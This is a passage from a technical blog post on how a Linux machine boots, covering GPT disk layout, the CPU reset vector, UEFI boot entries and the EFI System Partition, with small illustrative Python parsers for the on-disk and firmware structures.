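        "header_size": le(block, 12, 4),
        "current_lba": le(block, 24, 8),
        "backup_lba": le(block, 32, 8),
        "first_usable_lba": le(block, 40, 8),
        "last_usable_lba": le(block, 48, 8),
        "entries_start_lba": le(block, 72, 8),
        "num_entries": le(block, 80, 4),
        "entry_size": le(block, 84, 4),
    }


def make_header(total_lbas):
    """Build a synthetic primary header for a disk of `total_lbas` blocks."""
    block = bytearray(512)
    block[0:8] = GPT_SIGNATURE
    fields = [
        (12, 4, 92),                # header size in bytes
        (24, 8, 1),                 # this header lives at LBA1
        (32, 8, total_lbas - 1),    # the backup header is the last block
        (40, 8, 34),                # first usable LBA, right after the entries
        (48, 8, total_lbas - 34),   # last usable LBA, before the secondary GPT
        (72, 8, 2),                 # the partition entries start at LBA2
        (80, 4, 128),               # number of partition entries
        (84, 4, 128),               # size of each entry in bytes
    ]
    for offset, size, value in fields:
        block[offset:offset + size] = value.to_bytes(size, "little")
    return bytes(block)


header = parse_gpt_header(make_header(2048))
print(header["first_usable_lba"], header["last_usable_lba"])   # 34 2014
print(header["num_entries"], header["entry_size"])             # 128 128
</code></pre></div>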
<h4 id="partition-entries">Partition Entries</h4>
<p>The partition entries span <code>LBA2-LBA33</code>, with each block containing 4 entries, making it <code>512/4=128</code> bytes per partition entry. Unsurprisingly, each entry represents a possible partition and if present contains the metadata necessary to define it: type GUID, unique GUID, start LBA, end LBA, name, attribute flags etc.</p>
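<p>Here&rsquo;s a small sketch of what decoding one of those 128-byte entries might look like in Python. The field offsets follow the standard GPT entry layout (GUIDs are stored mixed-endian, which <code>uuid.UUID(bytes_le=...)</code> handles, and the name is UTF-16LE), while the function names and the sample entry are made up for illustration:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">import uuid

ENTRY_SIZE = 128


def parse_entry(raw):
    """Decode one 128-byte GPT partition entry, or None if the slot is unused."""
    type_guid = uuid.UUID(bytes_le=raw[0:16])
    if type_guid.int == 0:
        return None   # an all-zero type GUID marks an empty slot
    return {
        "type_guid": type_guid,
        "unique_guid": uuid.UUID(bytes_le=raw[16:32]),
        "first_lba": int.from_bytes(raw[32:40], "little"),
        "last_lba": int.from_bytes(raw[40:48], "little"),
        "attributes": int.from_bytes(raw[48:56], "little"),
        "name": raw[56:128].decode("utf-16-le").rstrip("\x00"),
    }


def make_entry(type_guid, unique_guid, first_lba, last_lba, name):
    """Build a synthetic entry for demonstration purposes only."""
    raw = bytearray(ENTRY_SIZE)
    raw[0:16] = type_guid.bytes_le
    raw[16:32] = unique_guid.bytes_le
    raw[32:40] = first_lba.to_bytes(8, "little")
    raw[40:48] = last_lba.to_bytes(8, "little")
    encoded = name.encode("utf-16-le")
    raw[56:56 + len(encoded)] = encoded
    return bytes(raw)


# Hypothetical GUID values, chosen only so the demo has something to print.
sample = make_entry(uuid.UUID(int=0x1234), uuid.UUID(int=0x5678), 34, 2014, "demo")
entry = parse_entry(sample)
print(entry["name"], entry["first_lba"], entry["last_lba"])   # demo 34 2014
print(parse_entry(bytes(ENTRY_SIZE)))                         # None
</code></pre></div>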
<h4 id="partitions">Partitions</h4>
<p>These are the areas of storage defined by the partition entries above, and are where our actual operating system and user data are going to be found. Not much else to say!</p>
<h4 id="secondary-gpt">Secondary GPT</h4>
<p>The Secondary GPT can be found at the end of the disk and is essentially just a duplicate of the Primary GPT for added redundancy in case the Primary gets corrupted.</p>
<h4 id="more-gpt-resources">More GPT Resources</h4>
<ol>
<li><a href="http://ntfs.com/guid-part-table.htm">http://ntfs.com/guid-part-table.htm</a></li>
</ol>
<h2 id="0x01-push-the-button">0x01 Push The Button!</h2>
<p><img src="https://sam4k.com/content/images/2021/09/POWERON.gif" alt=""></p>
<p>So now we know <em>how</em> stuff is stored on our disk, let&rsquo;s figure out what to do with the stuff on it and how that lets me play Crusader Kings III. The first step? Pushing that power button of course!</p>
<p>I know I said I was going to avoid digging too deep into the nitty-gritty with this series, but I think it&rsquo;s worth briefly touching on what&rsquo;s going on under-the-hood here rather than <em>thematic cut to UEFI</em>; that said feel free to skip this section for the theatrical cut.</p>
<p>Okay let&rsquo;s do this. So, we&rsquo;ve just hit the power button, what now? Well I&rsquo;m no engineer but as far as I understand, pressing that button causes a momentary short circuit in the motherboard which is enough for it to send a signal over to the Power Supply Unit (PSU).</p>
<p>Upon receiving the signal, the PSU provides electricity to the computer. The motherboard should then receive the power good signal and start the CPU. The CPU then does some initialisation and, importantly, begins executing at a pre-configured start address, <code>0xfffffff0</code>, which is where it expects to find the first instruction. This address is called the reset vector and typically contains a <code>jmp</code> instruction which takes you to the BIOS/UEFI entry point.</p>
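<p>As a quick aside on why a <code>jmp</code> lives there: <code>0xfffffff0</code> sits just 16 bytes below the 4GiB mark, so there isn&rsquo;t room for much else. A couple of lines of Python make the arithmetic explicit (the variable names are just for illustration):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">RESET_VECTOR = 0xfffffff0
FOUR_GIB = 2 ** 32   # one past the highest 32-bit address

# Bytes between the reset vector and the top of the 32-bit address space.
room_for_code = FOUR_GIB - RESET_VECTOR

print(hex(RESET_VECTOR), room_for_code)   # 0xfffffff0 16
</code></pre></div>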
<h3 id="fancy-a-deeper-dive">Fancy a deeper dive?</h3>
<ol>
<li><a href="https://0xax.gitbooks.io/linux-insides/content/Booting/linux-bootstrap-1.html">https://0xax.gitbooks.io/linux-insides/content/Booting/linux-bootstrap-1.html</a></li>
</ol>
<h2 id="0x02-uefi">0x02 UEFI</h2>
<p><img src="https://sam4k.com/content/images/2021/10/thebeginning.gif" alt=""></p>
<p>Before we dive into the technicals, let&rsquo;s clear up a couple of naming ambiguities:</p>
<blockquote>
<p>Unified Extensible Firmware Interface (UEFI) is a specification for a software program that connects a computer&rsquo;s firmware to its operating system (OS).<a href="https://whatis.techtarget.com/definition/Unified-Extensible-Firmware-Interface-UEFI#:~:text=Unified%20Extensible%20Firmware%20Interface%20(UEFI)%20is%20a%20specification%20for%20a,its%20operating%20system%20(OS).&amp;text=Like%20BIOS%2C%20UEFI%20is%20installed,runs%20when%20booting%20a%20computer.">[1]</a></p>
</blockquote>
<p>UEFI is the successor of BIOS, although as many people still erroneously refer to UEFI as BIOS, the old BIOS is often referred to as Legacy BIOS; so things can get a bit confusing when people are referring to the BIOS - do they mean UEFI or legacy?!</p>
<p>Upon executing, UEFI will begin initialising and checking hardware; this includes things like peripherals allowing for mouse use in the boot menu, wild! Next it checks the special EFI variables stored in nonvolatile RAM (NVRAM). These store configurations that can be set by the OS or the user. You can access these with root perms via the command <code>efibootmgr -v</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[sam@opulence ~]$ efibootmgr -v
</span></span><span class="line"><span class="cl">BootCurrent: 0008
</span></span><span class="line"><span class="cl">Timeout: 2 seconds
</span></span><span class="line"><span class="cl">BootOrder: 0000,0001,0002,0003,0004,0005,0006
</span></span><span class="line"><span class="cl">Boot0000* EndeavourOS
</span></span><span class="line"><span class="cl">                        HD(1,
</span></span><span class="line"><span class="cl">                           GPT,
</span></span><span class="line"><span class="cl">                           xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,
</span></span><span class="line"><span class="cl">                           0x1000,
</span></span><span class="line"><span class="cl">                           0x100000
</span></span><span class="line"><span class="cl">                        )/File(\EFI\ENDEAVOUROS\GRUBX64.EFI)
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">Boot0004* UEFI:CD/DVD Drive     BBS(129,,0x0)
</span></span><span class="line"><span class="cl">Boot0005* UEFI:Removable Device BBS(130,,0x0)
</span></span><span class="line"><span class="cl">Boot0006* UEFI:Network Device   BBS(131,,0x0)
</span></span></code></pre></div><p>So we can see here that among other uses, the EFI variables determine the order in which the boot manager will attempt to load UEFI drivers and applications.</p>
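<p>If you&rsquo;d rather poke at the raw variables, Linux exposes them as files via efivarfs. Below is a minimal Python sketch that decodes <code>BootOrder</code>. It assumes efivarfs is mounted at <code>/sys/firmware/efi/efivars</code>, where each file starts with a 4-byte attribute mask followed by the variable data, and for <code>BootOrder</code> that data is a list of little-endian 16-bit boot entry numbers. The function names are mine, and the printed example uses a made-up blob rather than my real NVRAM:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">from pathlib import Path

EFI_GLOBAL_GUID = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS = Path("/sys/firmware/efi/efivars")   # assumption: efivarfs is mounted here


def parse_boot_order(raw):
    """Decode an efivarfs BootOrder blob into labels like 'Boot0000'."""
    data = raw[4:]   # skip the 4-byte attribute mask efivarfs puts in front
    ids = [int.from_bytes(data[i:i + 2], "little") for i in range(0, len(data), 2)]
    return ["Boot%04X" % n for n in ids]


def read_boot_order():
    """Read BootOrder from the running system (Linux booted via UEFI only)."""
    path = EFIVARS / ("BootOrder-" + EFI_GLOBAL_GUID)
    return parse_boot_order(path.read_bytes())


# Synthetic blob: attribute mask 0x7 followed by entries 0, 1 and 2.
blob = bytes([7, 0, 0, 0]) + b"\x00\x00\x01\x00\x02\x00"
print(parse_boot_order(blob))   # ['Boot0000', 'Boot0001', 'Boot0002']
</code></pre></div>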
<p>After loading up these variables, UEFI will begin to try and load each of the active entries listed, in the order defined by <code>BootOrder</code>. <code>Boot0000</code> defines a typical UEFI native boot entry and tells UEFI:</p>
<ol>
<li>Exactly where to look via the <code>EFI_DEVICE_PATH_PROTOCOL</code>. This is the <code>HD(1,GPT,xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,0x1000,0x100000)</code> bit.</li>
<li>What file to load. This is the <code>File(\EFI\ENDEAVOUROS\GRUBX64.EFI)</code> bit and as the name suggests is the GRUB bootloader for my EndeavourOS install.</li>
</ol>
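<p>To show how those two pieces break down, here&rsquo;s a rough Python sketch that picks apart the entry above. It treats the <code>HD(...)</code> fields as partition number, partition scheme, partition GUID, start LBA and size in blocks, and assumes 512-byte logical blocks to convert to bytes. The regex only handles this one shape of device path and the names are my own:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">import re

SECTOR_SIZE = 512   # assumption: 512-byte logical blocks

# Only matches the simple HD(...)/File(...) form shown above.
DEVICE_PATH = re.compile(
    r"HD\((\d+),(\w+),([0-9a-fA-Fx-]+),(0x[0-9a-fA-F]+),(0x[0-9a-fA-F]+)\)"
    r"/File\((.+)\)"
)


def parse_boot_entry(path):
    """Split an efibootmgr-style device path into its parts."""
    match = DEVICE_PATH.fullmatch(path)
    if match is None:
        raise ValueError("unrecognised device path: " + path)
    number, scheme, guid, start, size, file_path = match.groups()
    return {
        "partition_number": int(number),
        "scheme": scheme,
        "partition_guid": guid,
        "start_byte": int(start, 16) * SECTOR_SIZE,
        "size_bytes": int(size, 16) * SECTOR_SIZE,
        "file": file_path,
    }


entry = parse_boot_entry(
    r"HD(1,GPT,xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,0x1000,0x100000)"
    r"/File(\EFI\ENDEAVOUROS\GRUBX64.EFI)"
)
print(entry["start_byte"] // 2 ** 20, "MiB in")     # 2 MiB in
print(entry["size_bytes"] // 2 ** 20, "MiB long")   # 512 MiB long
</code></pre></div>
<p>So in this case the partition starts 2MiB into the disk and is 512MiB long.</p>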
<p>Armed with this information, UEFI will now go ahead and look for the EFI System Partition (ESP) on the specified storage device, mount it and launch that file. Given just a disk, UEFI is able to find the ESP via the GPT entries we mentioned earlier, where the ESP is identified by a dedicated partition type GUID.</p>
<p>One of the key improvements of UEFI is that it is capable of reading the FAT12, FAT16 and FAT32 file systems. So typically the ESP will be formatted as FAT32, allowing UEFI to read the partition and locate our <code>ENDEAVOUROS\GRUBX64.EFI</code> file and launch it.</p>
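<p>Finding the ESP from the GPT entries boils down to comparing each entry&rsquo;s type GUID against the well-known ESP one. A minimal Python sketch, using the standard ESP and Linux filesystem type GUIDs but otherwise synthetic entries and hypothetical helper names:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">import uuid

ESP_TYPE_GUID = uuid.UUID("c12a7328-f81f-11d2-ba4b-00a0c93ec93b")
LINUX_FS_TYPE_GUID = uuid.UUID("0fc63daf-8483-4772-8e79-3d69d8477de4")


def find_esp(entries):
    """Return the 1-based number of the first ESP entry, or None if absent."""
    for number, raw in enumerate(entries, start=1):
        # The type GUID is the first 16 bytes of an entry, stored mixed-endian.
        if uuid.UUID(bytes_le=raw[0:16]) == ESP_TYPE_GUID:
            return number
    return None


def entry_with_type(type_guid):
    """Build a synthetic 128-byte entry carrying only a type GUID (demo data)."""
    return type_guid.bytes_le + bytes(112)


entries = [entry_with_type(ESP_TYPE_GUID), entry_with_type(LINUX_FS_TYPE_GUID)]
print(find_esp(entries))   # 1
</code></pre></div>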
<h3 id="the-esp">The ESP</h3>
<p>While we&rsquo;re on the topic of the ESP, it&rsquo;s worth mentioning the flexibility of this partition. Usually sized around 300-500MB, the ESP can contain the bootloaders for multiple OSes and will have corresponding EFI vars in NVRAM. So your ESP could look something like this<a href="https://wiki.mageia.org/en/About_EFI_UEFI">[2]</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">/</span><span class="n">boot</span><span class="o">/</span><span class="n">efi</span><span class="o">/</span><span class="n">EFI</span>
</span></span><span class="line"><span class="cl"><span class="err">├──</span> <span class="n">boot</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span> <span class="err">├──</span> <span class="n">bootx64</span><span class="o">.</span><span class="n">efi</span> <span class="p">[</span><span class="n">Default</span> <span class="n">bootloader</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span> <span class="err">└──</span> <span class="n">bootx64</span><span class="o">.</span><span class="n">OEM</span> <span class="p">[</span><span class="n">Backup</span> <span class="n">of</span> <span class="n">same</span> <span class="n">as</span> <span class="n">delivered</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span>
</span></span><span class="line"><span class="cl"><span class="err">├──</span> <span class="n">EndeavourOS</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span> <span class="err">└──</span> <span class="n">grubx64</span><span class="o">.</span><span class="n">efi</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span>
</span></span><span class="line"><span class="cl"><span class="err">├──</span> <span class="n">Ubuntu</span>
</span></span><span class="line"><span class="cl"><span class="err">│</span> <span class="err">└──</span> <span class="n">grubx64</span><span class="o">.</span><span class="n">efi</span>
</span></span></code></pre></div><h3 id="csm">CSM</h3>
<p>One final feature worth touching on is the Compatibility Support Module (CSM) in UEFI, which essentially provides Legacy BIOS compatibility via emulating a BIOS environment. This is an example of where your GPT&rsquo;s &ldquo;Protective MBR&rdquo; would come in handy.</p>
<h4 id="refs-extras">Refs &amp; Extras</h4>
<ol>
<li><a href="https://whatis.techtarget.com/definition/Unified-Extensible-Firmware-Interface-UEFI#:~:text=Unified%20Extensible%20Firmware%20Interface%20(UEFI)%20is%20a%20specification%20for%20a,its%20operating%20system%20(OS).&amp;text=Like%20BIOS%2C%20UEFI%20is%20installed,runs%20when%20booting%20a%20computer">https://whatis.techtarget.com/definition/Unified-Extensible-Firmware-Interface-UEFI</a></li>
<li><a href="https://wiki.mageia.org/en/About_EFI_UEFI">https://wiki.mageia.org/en/About_EFI_UEFI</a></li>
<li><a href="https://www.happyassassin.net/posts/2014/01/25/uefi-boot-how-does-that-actually-work-then/">https://www.happyassassin.net/posts/2014/01/25/uefi-boot-how-does-that-actually-work-then/</a></li>
</ol>
<h2 id="0x03-optional-bootloader">0x03 Optional Bootloader</h2>
<p><img src="https://sam4k.com/content/images/2021/10/notsofast.gif" alt=""></p>
<p>It looks like I severely underestimated the length of this post, (we&rsquo;re already 1700 words!), so to make this a bit more manageable I&rsquo;m going to split this into two posts.</p>
<p>The next post, part 2, will cover the following sections:</p>
<ul>
<li>0x03 Optional Bootloader (surprise, surprise!)</li>
<li>0x04 The Kernel</li>
<li>0x05 Systemd (yikes)</li>
</ul>
<p>exit(0);</p>
]]></content:encoded></item></channel></rss>